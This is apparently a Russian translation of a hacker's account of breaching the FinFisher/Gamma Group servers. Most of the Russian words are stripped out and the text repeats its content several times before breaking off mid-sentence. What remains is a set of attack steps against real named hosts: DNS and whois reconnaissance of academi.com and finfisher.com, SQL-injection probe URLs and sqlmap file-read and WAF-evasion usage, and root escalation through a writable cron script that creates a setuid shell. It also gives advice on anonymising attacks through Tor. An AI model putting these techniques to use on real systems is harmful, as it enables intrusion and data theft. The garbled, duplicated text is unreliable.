Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

